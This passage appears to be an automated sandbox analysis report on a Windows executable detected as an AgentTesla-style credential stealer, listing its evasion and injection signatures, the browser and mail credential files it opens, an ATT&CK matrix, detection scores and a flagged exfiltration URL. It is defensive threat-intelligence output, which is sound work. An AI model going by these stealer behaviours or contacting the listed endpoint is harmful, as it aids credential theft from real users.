                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597766Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597545Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597328Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596672Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596540Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596437Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596328Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596217Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 596022Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595913Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595811Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594585Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594474Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594359Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594226Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594125Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 594016Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593906Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593793Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593687Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593571Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593469Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeThread delayed: delay time: 593358Jump to behavior
                    Source: DNXS-04-22.exe, 00000004.00000002.3785424343.0000000000D57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeCode function: 4_2_0677BE28 LdrInitializeThunk,4_2_0677BE28
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeMemory written: C:\Users\user\Desktop\DNXS-04-22.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeProcess created: C:\Users\user\Desktop\DNXS-04-22.exe "C:\Users\user\Desktop\DNXS-04-22.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Users\user\Desktop\DNXS-04-22.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Users\user\Desktop\DNXS-04-22.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.7570000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.337a064.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.337b07c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.3359434.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\DNXS-04-22.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.7570000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.7570000.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.337a064.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.337b07c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.3359434.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1366480871.0000000007570000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1359852790.0000000003357000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.DNXS-04-22.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40ca790.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DNXS-04-22.exe.40a9d70.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 5288, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: DNXS-04-22.exe PID: 7264, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading
                    111
                    Process Injection
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    Security Software Discovery
                    Remote Services1
                    Email Collection
                    11
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    31
                    Virtualization/Sandbox Evasion
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
                    Process Injection
                    Security Account Manager31
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin Shares1
                    Data from Local System
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Deobfuscate/Decode Files or Information
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture13
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information
                    LSA Secrets1
                    System Network Configuration Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                    Software Packing
                    Cached Domain Credentials13
                    System Information Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    DNXS-04-22.exe66%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    DNXS-04-22.exe70%VirustotalBrowse
                    DNXS-04-22.exe100%AviraHEUR/AGEN.1352067
                    DNXS-04-22.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    reallyfreegeoip.org2%VirustotalBrowse
                    scratchdreams.tk17%VirustotalBrowse
                    checkip.dyndns.com0%VirustotalBrowse
                    checkip.dyndns.org0%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    http://checkip.dyndns.org/q0%URL Reputationsafe
                    http://reallyfreegeoip.org0%URL Reputationsafe
                    http://reallyfreegeoip.org0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    https://reallyfreegeoip.org0%URL Reputationsafe
                    http://checkip.dyndns.org0%URL Reputationsafe
                    http://checkip.dyndns.com0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                    https://scratchdreams.tk100%Avira URL Cloudmalware
                    https://reallyfreegeoip.org/xml/191.96.150.2250%Avira URL Cloudsafe
                    https://scratchdreams.tk/_send_.php?TS100%Avira URL Cloudmalware
                    http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources0%Avira URL Cloudsafe
                    http://scratchdreams.tk100%Avira URL Cloudmalware
                    https://reallyfreegeoip.org/xml/191.96.150.225$0%Avira URL Cloudsafe
                    https://scratchdreams.tk/_send_.php?TS16%VirustotalBrowse
                    http://scratchdreams.tk17%VirustotalBrowse
                    https://scratchdreams.tk18%VirustotalBrowse
                    http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.Resources2%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    reallyfreegeoip.org
                    104.21.67.152
                    truefalseunknown
                    scratchdreams.tk
                    104.21.27.85
                    truefalseunknown
                    checkip.dyndns.com
                    193.122.130.0
                    truefalseunknown
                    checkip.dyndns.org
                    unknown
                    unknowntrueunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/false
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.org/xml/191.96.150.225false
                    • Avira URL Cloud: safe
                    unknown
                    https://scratchdreams.tk/_send_.php?TSfalse
                    • 16%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://checkip.dyndns.org/qDNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://scratchdreams.tkDNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                    • 18%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    http://reallyfreegeoip.orgDNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://reallyfreegeoip.orgDNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.orgDNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B1C000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://checkip.dyndns.comDNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://tempuri.org/DataSet1.xsdAProNaturBio.Properties.ResourcesDNXS-04-22.exefalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDNXS-04-22.exe, 00000000.00000002.1359852790.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://scratchdreams.tkDNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C2D000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 17%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      https://reallyfreegeoip.org/xml/191.96.150.225$DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B6B000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BE3000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://reallyfreegeoip.org/xml/DNXS-04-22.exe, 00000000.00000002.1362662717.000000000403E000.00000004.00000800.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3784958819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, DNXS-04-22.exe, 00000004.00000002.3786729824.0000000002B28000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      104.21.67.152
                      reallyfreegeoip.orgUnited States
                      13335CLOUDFLARENETUSfalse
                      193.122.130.0
                      checkip.dyndns.comUnited States
                      31898ORACLE-BMC-31898USfalse
                      104.21.27.85
                      scratchdreams.tkUnited States
                      13335CLOUDFLARENETUSfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1435145
                      Start date and time:2024-05-02 07:59:25 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:DNXS-04-22.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@5/0@4/3
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 98%
                      • Number of executed functions: 181
                      • Number of non-executed functions: 52
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      TimeTypeDescription
                      08:00:11API Interceptor7367567x Sleep call for process: DNXS-04-22.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      104.21.67.152PO 32187 #290424.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                        Payment_Advice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                          DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                            e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                              rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                  edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                    58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                      Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                        SAT8765456000.xlam.xlsxGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                          193.122.130.0Payment_Advice.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                          • checkip.dyndns.org/
                                          edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          iCareFone.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                          • checkip.dyndns.org/
                                          D09876500900000H.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          Quark Browser.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                          • checkip.dyndns.org/
                                          Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
                                          e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • checkip.dyndns.org/
